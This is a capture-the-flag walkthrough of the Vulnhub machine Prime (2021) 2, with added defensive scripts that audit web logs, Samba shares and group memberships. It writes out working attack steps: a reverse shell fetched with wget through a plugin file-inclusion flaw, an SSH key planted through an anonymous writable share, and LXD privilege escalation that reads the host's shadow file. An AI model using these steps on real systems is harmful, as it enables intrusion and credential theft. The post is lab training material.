This post, Prime (2021) 2: Walkthrough – Vulnhub – Writeup, describes the steps I performed to root the machine by Suraj. However, I have to say that the machine didn’t work on my VirtualBox, only on VMware.
Link to the machine: https://www.vulnhub.com/entry/prime-2021-2,696/
Check out the Harry Potter series as well.
Firstly, I identified the target and open ports using netdiscover and nmap.
sudo netdiscover -i eth0 -r 192.168.19.0/24
nmap -T4 -sC -sV -p- --min-rate=1000 192.168.19.135
Here, the Python server lets us browse a user's home directory, whereas the Apache server hosts just a simple website. So I can view the contents of one server and do directory enumeration on the other.
View the contents
From the screenshot above, we can say that the directory we were browsing belongs to jarvis. Likewise, there is a PHP file that executes shell commands taken from the GET parameter ‘cmd’. Hence, we can anticipate that a local file inclusion vulnerability on the Apache server would let us reach that file.
Thus, I did directory enumeration on the Apache server.
gobuster dir -u http://192.168.19.135 -x html,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
I found an installation of WordPress at the path /wp.
Now that I know the website is running WordPress, I can enumerate it using wpscan.
# replace WPSCAN_KEY with your WPScan API token
wpscan --api-token $WPSCAN_KEY --url http://192.168.19.135/wp --detection-mode aggressive -e
Finally, I confirmed that there is an LFI vulnerability in one of the installed plugins. Subsequently, I visited the links in the references for the proof of concept.
Local File Inclusion
The vulnerability works and I can run the shell.php that we saw earlier on the Python server. Now, in Firefox, I tried executing commands through it.
Although the target has nc installed, I couldn’t get a reverse shell from there. So, I decided to copy a web shell to the target and invoke it.
On local machine:
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
python3 -m http.server
I listened on a port for the reverse shell, and downloaded my shell.php into the target's /tmp directory.
# On local machine:
nc -nlvp 4444
# In Firefox, replace the cmd parameter's value with
wget http://192.168.19.132:8000/shell.php -O /tmp/shell.php # 192.168.19.132 is my IP
Then, I invoked the shell using the same vulnerability.
Finally, I got the reverse shell. Now, we have to find the user’s credentials and get into his home directory.
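From the defender's side, the request chain just described (a plugin LFI with a traversal payload, then a web shell driven by a cmd parameter that fetches a second payload) leaves a distinctive trail in the Apache access log. The script below is an added example and not code from the original post: it parses combined-format log lines and flags traversal sequences, references to sensitive files, command-style parameter names and remote-fetch commands. The log lines, the plugin path EXAMPLE-PLUGIN and the parameter names are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache "combined" log format (not real logs from the
# machine). They mirror the kind of requests a plugin LFI followed by a web-shell
# call would leave behind.
SAMPLE_ACCESS_LOG = """\
192.168.19.132 - - [10/Sep/2021:10:01:02 +0000] "GET /wp/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.19.132 - - [10/Sep/2021:10:01:09 +0000] "GET /wp/wp-content/plugins/EXAMPLE-PLUGIN/view.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1406 "-" "Mozilla/5.0"
192.168.19.132 - - [10/Sep/2021:10:01:15 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 63 "-" "Mozilla/5.0"
192.168.19.132 - - [10/Sep/2021:10:01:20 +0000] "GET /shell.php?cmd=wget%20http%3A%2F%2F192.168.19.132%3A8000%2Fshell.php%20-O%20%2Ftmp%2Fshell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.19.132 - - [10/Sep/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names commonly used by simple PHP web shells for the command to run
# (assumed list; extend it to match what you see in your own environment).
COMMAND_PARAMS = {"cmd", "command", "exec", "c"}
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "wp-config.php", ".ssh/")


def classify_request(target: str) -> list[str]:
    """Return the suspicious traits found in one request target (path + query)."""
    reasons = []
    parsed = urlsplit(target)
    # parse_qs percent-decodes once; decoding again catches %252E%252E-style double encoding.
    params = parse_qs(parsed.query, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = unquote(unquote(raw))
            normalized = value.replace("\\", "/")
            if "../" in normalized:
                reasons.append(f"path traversal in '{name}'")
            if any(s in normalized for s in SENSITIVE_FILES):
                reasons.append(f"sensitive file reference in '{name}'")
            if name.lower() in COMMAND_PARAMS:
                reasons.append(f"command parameter '{name}'")
            if re.search(r"\b(wget|curl)\b.*https?://", normalized):
                reasons.append(f"remote fetch via '{name}'")
    return reasons


def analyze_access_log(text: str) -> list[dict]:
    """Parse each log line and collect the ones with suspicious request traits."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        reasons = classify_request(m["target"])
        if reasons:
            findings.append({
                "line": lineno,
                "ip": m["ip"],
                "status": int(m["status"]),
                "target": m["target"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in analyze_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {f['line']}: {f['ip']} {f['target']} -> {', '.join(f['reasons'])}")
```

The status code is kept in each finding on purpose: a 200 on a traversal request is the signal that the inclusion worked, while a run of 404s from the same source looks like scanning. Running this over the real access log after the WordPress plugin was patched is a quick way to confirm whether the hole was already used.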
Getting user’s access
I have to give you some sad news now. Although we got a reverse shell, it was all a rabbit hole. I discovered this after using tools like linpeas.sh and LinEnum.sh. However, I looked at the SMB configuration file to see if it allows anonymous access.
Now, we can list the shares by the following commands.
smbclient -N -L \\\\192.168.19.135\\
smbclient -N \\\\192.168.19.135\\welcome
Now, I will see if I have write access on the share.
It looks like we can write to the home directory of the user jarves. Therefore, I will add my own SSH public key to the authorized_keys of jarves.
Add public key
Now, I can write my public key to a file on the local machine and copy that file using smbclient.
echo __your_public_key__ > authorized_keys
In smbclient, the syntax to upload a local file to the remote machine is as follows:
put local_file remote_file
Finally, I can login using ssh.
ssh email@example.com -i ~/.ssh/id_rsa
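The whole user-access step hinged on one misconfiguration: a guest-accessible share that was also writable and pointed at a home directory. The script below is an added example, not part of the original post, that audits an smb.conf for exactly that: it parses the file, resolves Samba's synonyms (guest ok/public, writable/writeable/read only) and their defaults, and reports guest-readable and guest-writable shares, escalating when the path is under /home. The sample configuration is constructed for the demonstration and is not the machine's real file.

```python
from typing import Optional

# Constructed sample smb.conf for the demonstration (illustrative values only).
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server role = standalone server
   map to guest = Bad User

[welcome]
   comment = Guest share
   path = /home/jarves
   browseable = yes
   guest ok = yes
   read only = no

[backup]
   path = /srv/backup
   public = yes
   writable = no

[private]
   path = /srv/private
   valid users = admin
   writable = yes
"""


def parse_smb_conf(text: str) -> dict[str, dict[str, str]]:
    """Minimal smb.conf parser: section name -> lower-cased key/value map.
    Handles '#'/';' comments, blank lines, leading whitespace and
    backslash line continuations; does not expand %-variables."""
    sections: dict[str, dict[str, str]] = {}
    current = None
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def _yes(value: Optional[str], default: bool) -> bool:
    if value is None:
        return default
    return value.strip().lower() in ("yes", "true", "1")


def share_allows_guest(share: dict[str, str]) -> bool:
    # 'public' is a synonym for 'guest ok'; both default to no.
    return _yes(share.get("guest ok"), False) or _yes(share.get("public"), False)


def share_is_writable(share: dict[str, str]) -> bool:
    # 'writable'/'writeable'/'write ok' are inverted synonyms of 'read only',
    # whose Samba default is yes (i.e. shares are read-only unless stated).
    for key in ("writable", "writeable", "write ok"):
        if key in share:
            return _yes(share[key], False)
    return not _yes(share.get("read only"), True)


def audit_smb_conf(text: str) -> list[dict]:
    """Report guest-accessible shares, ordered [global] first then as configured."""
    conf = parse_smb_conf(text)
    findings = []
    map_to_guest = conf.get("global", {}).get("map to guest", "Never")
    if map_to_guest.lower() != "never":
        findings.append({"share": "global", "severity": "info",
                         "issue": f"map to guest = {map_to_guest}: failed logins become guest sessions"})
    for name, share in conf.items():
        if name in ("global", "printers", "print$"):
            continue
        guest, writable = share_allows_guest(share), share_is_writable(share)
        path = share.get("path", "(no path)")
        if guest and writable:
            sev = "critical" if path.startswith("/home/") else "high"
            findings.append({"share": name, "severity": sev, "issue": f"anonymous write access to {path}"})
        elif guest:
            findings.append({"share": name, "severity": "medium", "issue": f"anonymous read access to {path}"})
    return findings


if __name__ == "__main__":
    for f in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"[{f['severity']}] {f['share']}: {f['issue']}")
```

A writable guest share on a home directory is what makes the authorized_keys drop possible: the fix is `guest ok = no` (or `valid users = ...`) on the share, and never exporting a home directory to guests. The `smbclient -N -L` listing used above is the external check that pairs with this file-level one.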
Finally, I can now work on the privilege escalation part. When I ran id, I saw that the user belongs to the lxd group.
https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation provides the details on the escalation. I used method 1 for this.
# Install dependencies
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
go get -d -v github.com/lxc/distrobuilder
# Build distrobuilder (installs the binary under $HOME/go/bin)
cd $HOME/go/src/github.com/lxc/distrobuilder
make
# Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
# alpine.yaml is the distrobuilder image definition for Alpine from the lxc-ci repository (see the linked guide); place it in this directory
# Create the container image (produces lxd.tar.xz and rootfs.squashfs)
sudo /home/kali/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
# Serve the two image files to the target
python3 -m http.server
On the target machine:
# Fetch the image files served from my machine (same IP as before)
wget http://192.168.19.132:8000/lxd.tar.xz
wget http://192.168.19.132:8000/rootfs.squashfs
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list # You can see your newly imported image
lxc init alpine privesc -c security.privileged=true
lxc list # List containers
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
This drops us at the root of the container's own filesystem. The host's filesystem is mounted at /mnt/root, so we change directory there.
cat /mnt/root/etc/shadow # we can view the shadow file of the host
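Membership in the lxd group is the whole privilege escalation here, so the audit a defender wants is simply "who is in that group?", and the answer must include users whose primary GID in /etc/passwd is the group's GID, who do not appear in the /etc/group member list at all. The script below is an added example, not code from the original post or the linked guide. It resolves effective membership from both files and reports users in root-equivalent groups; it generalizes beyond lxd to lxc, docker and disk, which grant comparable host access. The /etc/group and /etc/passwd excerpts, and the users builder and www-data, are constructed for the demonstration.

```python
# Constructed /etc/group and /etc/passwd excerpts (not the machine's real files).
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
lxd:x:130:jarves
docker:x:999:
users:x:100:
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
jarves:x:1000:1000::/home/jarves:/bin/bash
builder:x:1001:130::/home/builder:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# Groups whose membership is effectively root on a typical host (assumed list).
RISKY_GROUPS = {
    "lxd": "can create a privileged container with the host root filesystem mounted inside",
    "lxc": "legacy LXC group with the same container-based access to the host",
    "docker": "can start a container with the host filesystem bind-mounted",
    "disk": "raw read/write access to block devices, bypassing file permissions",
}


def parse_group(text: str) -> dict[str, tuple[int, set[str]]]:
    """/etc/group -> {group: (gid, supplementary members)}."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue  # malformed line; skip rather than crash
        name, gid, members = parts[0], int(parts[2]), parts[3]
        groups[name] = (gid, {m for m in members.split(",") if m})
    return groups


def parse_passwd_primary_gids(text: str) -> dict[str, int]:
    """/etc/passwd -> {user: primary gid}."""
    primary = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) >= 4 and parts[0]:
            primary[parts[0]] = int(parts[3])
    return primary


def effective_members(group_text: str, passwd_text: str) -> dict[str, set[str]]:
    """Union of listed members and users whose primary GID is the group's GID."""
    groups = parse_group(group_text)
    primary = parse_passwd_primary_gids(passwd_text)
    result = {}
    for name, (gid, members) in groups.items():
        result[name] = set(members) | {u for u, g in primary.items() if g == gid}
    return result


def risky_memberships(group_text: str, passwd_text: str, risky=RISKY_GROUPS) -> list[dict]:
    """Report every risky group that has at least one effective member."""
    members = effective_members(group_text, passwd_text)
    findings = []
    for group, why in risky.items():
        users = sorted(members.get(group, set()))
        if users:
            findings.append({"group": group, "users": users, "why": why})
    return findings


if __name__ == "__main__":
    # On a live host, read the real files instead of the constructed samples:
    # open("/etc/group").read() and open("/etc/passwd").read()
    for f in risky_memberships(SAMPLE_GROUP, SAMPLE_PASSWD):
        print(f"{f['group']}: {', '.join(f['users'])} ({f['why']})")
```

In the sample, builder never appears in the lxd line of /etc/group but is still an lxd member through its primary GID, which is the case a grep of /etc/group misses. The remediation is to remove the user from the group (for example `gpasswd -d jarves lxd`) and keep the LXD socket restricted to administrators, since the group grants the same access to the host as the root shell obtained above.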
This machine gave me a mixed feeling. When I started doing this machine, I thought it was quite easy because everything was going well. However, I forgot to check whether anonymous access to the SMB server was allowed or not. Therefore, we should never overlook any information that is available to us. If I had checked the SMB share before diving deeper, I would have saved a lot of my time and yours. See you in the next post.